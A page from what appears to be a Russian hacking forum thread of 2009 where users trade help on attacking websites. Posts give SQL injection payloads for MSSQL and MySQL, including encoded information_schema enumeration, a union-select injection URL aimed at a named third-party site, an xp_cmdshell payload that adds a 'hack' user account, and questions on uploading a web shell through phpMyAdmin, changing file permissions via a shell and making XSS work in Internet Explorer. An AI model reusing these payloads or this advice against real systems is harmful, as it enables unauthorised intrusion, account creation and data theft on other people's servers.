Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    more 1 row, mssql не поддерживает limit либо top либо between
    1 на одном
    2 create procedure() begin ... end, select procedure()
    3 top 1 column_name from information_schema.columns where table_name='x'
     
    2 people like this.
  2. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    как бы спрашивал но вопрос теперь в другом) есть mysql-inj с файл_прив=У) при попытке прочитать папку с сайтом ничего не показывает хотя содержимое других папок отображает) как и файлов) может ли быть так что для мускула нет прав прочитать файл или содержимое папки?
     
  3. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    да либо не хватает прав либо не верно указан путь.
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ругается он на кавычки и никакие where= не прокатят+на HEX ругается,и интересно,как я колонки буду выбирать,если я их не знаю.Колонка1,колонка2...жесть
     
  5. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    дай урл, думаю многое станет ясным
     
    #4685 z00MAN, 17 Jan 2009
    Last edited: 17 Jan 2009
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Выше, с помощью запроса, который составил l1ght - получаешь первую колонку, а потом not in.

    А ещё лучше - кинуть ссылку.
     
    1 person likes this.
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    (select+top+1+column_name+from+information_schema.columns+where+table_name='users')--

    Не работает )

    ЗЫ: Не получается составить процедуру к БД =_=.

    Типо такой:

    xp_cmdshell [NET USER hack password /ADD]

    1+and+1=(select+xp_cmdshell+[NET USER help password /ADD])--

    Что-то вроде такоого ).Преобразовывал и в хекс,и в юрл, и наоборот.
     
    #4687 Велемир, 17 Jan 2009
    Last edited: 17 Jan 2009
  8. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    А что пишет-то?
    Хексил users без ковычки?
     
    1 person likes this.
  9. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    (select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)+CHAR(115)+CHAR(101)+CHAR(114)+CHAR(115))--
    В гете нужно + на %2B менять
    (select+top+1+column_name+from+information_schema. columns+where+table_name=CHAR(117)%2BCHAR(115)%2BCHAR(101)%2BCHAR(114)%2BCHAR(115))--
     
    1 person likes this.
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Почему когда делаешь вот так -
    то есть несуществующая колонка. Пишет, что колонки такой нет..
    Потом когда подбираешь количество колонок
    структура запроса уже другая и видно, что колонок вроде как 4.
    Однако когда делаешь селект - то пишется, что The used SELECT statements have a different number of columns
    Почему так?
     
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    попугай
    http://www.forestforum.ru/index.php?page=-3+union+select+1,2,3,4,5,version()--

    Там не один запрос
     
    1 person likes this.
  12. sNt

    sNt Elder - Старейшина

    Joined:
    30 Jul 2008
    Messages:
    117
    Likes Received:
    11
    Reputations:
    1
    :confused: Есть xss (работает только в Опере). Заточить под IE ни как не вышло... :( Помогите плз :(
     
    #4692 sNt, 17 Jan 2009
    Last edited: 17 Jan 2009
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Зашибись, а теперь наверное надо построчно угадывать код твоего css?:)

    И вообще, http://forum.antichat.ru/thread43254.html
     
  14. sNt

    sNt Elder - Старейшина

    Joined:
    30 Jul 2008
    Messages:
    117
    Likes Received:
    11
    Reputations:
    1
    это скриптинг
     
    #4694 sNt, 17 Jan 2009
    Last edited: 8 Mar 2009
  15. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Вопрос: Почему у меня включена директива expose_php и показывается версия интерпретатора РНР,а на http://education.ucsc.edu/phpinfo.php - нет ?
     
  16. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    17+and+1=(select+top+1+column_name+from+information_schema.columns+where+table_name=CHAR(117)%2bCHAR(115)%2bCHAR(101)%2bCHAR(114)%2bCHAR(115))--

    При запросе выдаёт страницу,но нету ни ошибки,ни вывода из базы.
     
    #4696 Велемир, 18 Jan 2009
    Last edited: 18 Jan 2009
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ответ : всё там отлично показывает
    X-Powered-By: PHP/5.1.6

    Велемир Давай ссылки на инъёкции, гадания растягиваются на 5 страниц
     
    #4697 Kakoytoxaker, 18 Jan 2009
    Last edited: 18 Jan 2009
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Ну,я имел ввиду запрос:

    http://localhost/script.php%27
     
  19. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    У меня вот такой вопрос,как можно изменить права докуменка на опший доступ (chmod 777) есле у меня есть только доступ к файлам на сайте через шелл и доступ к MySQL???
     
    1 person likes this.
  20. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Ребята, такой вопрос.
    Заливаю шелл через phpmyadmin
    Выскакивает ошибка:
    В чем косяк? чмода не хвататет? или путь не правильный?
    или еще чего-то?
     
    #4700 Octave_Parango, 19 Jan 2009
    Last edited: 19 Jan 2009
Thread Status:
Not open for further replies.